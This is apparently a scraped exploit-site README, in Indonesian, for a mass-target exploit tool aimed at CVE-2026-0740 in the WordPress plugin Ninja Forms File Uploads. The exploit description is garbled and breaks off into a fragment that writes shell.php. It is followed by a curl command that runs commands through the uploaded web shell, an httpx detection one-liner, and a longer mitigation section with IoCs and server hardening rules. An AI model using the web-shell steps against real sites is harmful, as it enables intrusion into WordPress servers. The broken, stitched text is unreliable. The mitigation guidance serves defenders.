## https://sploitus.com/exploit?id=65CA704B-9B8F-5E39-B193-A5966DAE5F2A
# CVE-2026-0740 โ Mass-Target Exploit Engine
**Author:** 0xNuts
**Contributor:** [Cursor](https://cursor.com)
**Repository:** https://github.com/ExDev994/CVE-2026-0740-mass
PoC untuk [CVE-2026-0740](https://vulners.com/cve/CVE-2026-0740): **Ninja Forms File Uploads ' > shell.php
```
Setelah upload sukses, skrip menampilkan URL shell. Verifikasi (hanya pada lab/authorized target):
```bash
curl "http://target.com/wp-content/shell.php?cmd=id"
```
---
### Deteksi Versi Plugin (Opsional)
```bash
httpx -fr -u http://target.com -ms 'file_uploads_nfpluginsettings-js' -er 'nfpluginsettings\.js\?ver=[\d\.]+'
```
---
## Cara Perbaikan (Mitigasi)
### 1. Update Plugin (Prioritas Utama)
Perbarui **Ninja Forms - File Uploads** ke versi **3.3.27 atau lebih baru** segera.
- WordPress Admin โ **Plugins** โ cek versi `Ninja Forms - File Uploads`
- Jika update otomatis tidak tersedia, unduh versi patched dari vendor resmi
### 2. Verifikasi Patch
Setelah update:
- Pastikan versi plugin >= 3.3.27
- Uji endpoint `wp-admin/admin-ajax.php` dengan action `nf_fu_get_new_nonce` / `nf_fu_upload` โ upload arbitrary harus ditolak
- Scan ulang dengan scanner (Nuclei template CVE-2026-0740) untuk konfirmasi
### 3. Indikator Kompromi (IoC)
Periksa direktori upload WordPress:
```text
wp-content/uploads/ninja-forms/tmp/
wp-content/uploads/ninja-forms/
wp-content/
```
Cari file asing: `.php`, `.pht`, `.phtml`, `.phar`, `.html`, `.svg`, `.js` yang tidak seharusnya ada.
Periksa juga log web server untuk request ke:
```text
/wp-admin/admin-ajax.php
```
dengan parameter `action=nf_fu_get_new_nonce` atau `action=nf_fu_upload`.
### 4. Hardening Tambahan
- **WAF / rate limiting** pada `/wp-admin/admin-ajax.php` untuk memblokir abuse mass-upload
- **Disable eksekusi PHP** di direktori `wp-content/uploads/` via konfigurasi web server:
**Apache (.htaccess di uploads/):**
```apache
Require all denied
```
**Nginx:**
```nginx
location ~* /wp-content/uploads/.*\.php$ {
deny all;
}
```
- **Least privilege**: pastikan file permission upload tidak writable oleh web server ke luar direktori yang diperlukan
- **Monitoring**: alert pada POST ke `admin-ajax.php` dengan action `nf_fu_*` dari IP asing atau volume tinggi
- **Backup & incident response**: jika IoC ditemukan, isolasi site, rotate credential DB/admin, audit plugin/theme lain
### 5. Jika Plugin Tidak Digunakan
Nonaktifkan dan **hapus** plugin **Ninja Forms - File Uploads** jika fitur upload tidak diperlukan.
---
## Referensi
- [CVE-2026-0740](https://vulners.com/cve/CVE-2026-0740)
- [Lexfo โ Technical Deep Dive](https://blog.lexfo.fr/ninja-forms-uploads_rce.html)
- [Wordfence โ 50,000 WordPress Sites Affected](https://www.wordfence.com/blog/2026/04/50000-wordpress-sites-affected-by-arbitrary-file-upload-vulnerability-in-ninja-forms-file-upload-wordpress-plugin/)
- [GHSA-v8wq-rjpf-669f](https://github.com/advisories/GHSA-v8wq-rjpf-669f)
- [Nuclei Template](https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2026/CVE-2026-0740.yaml)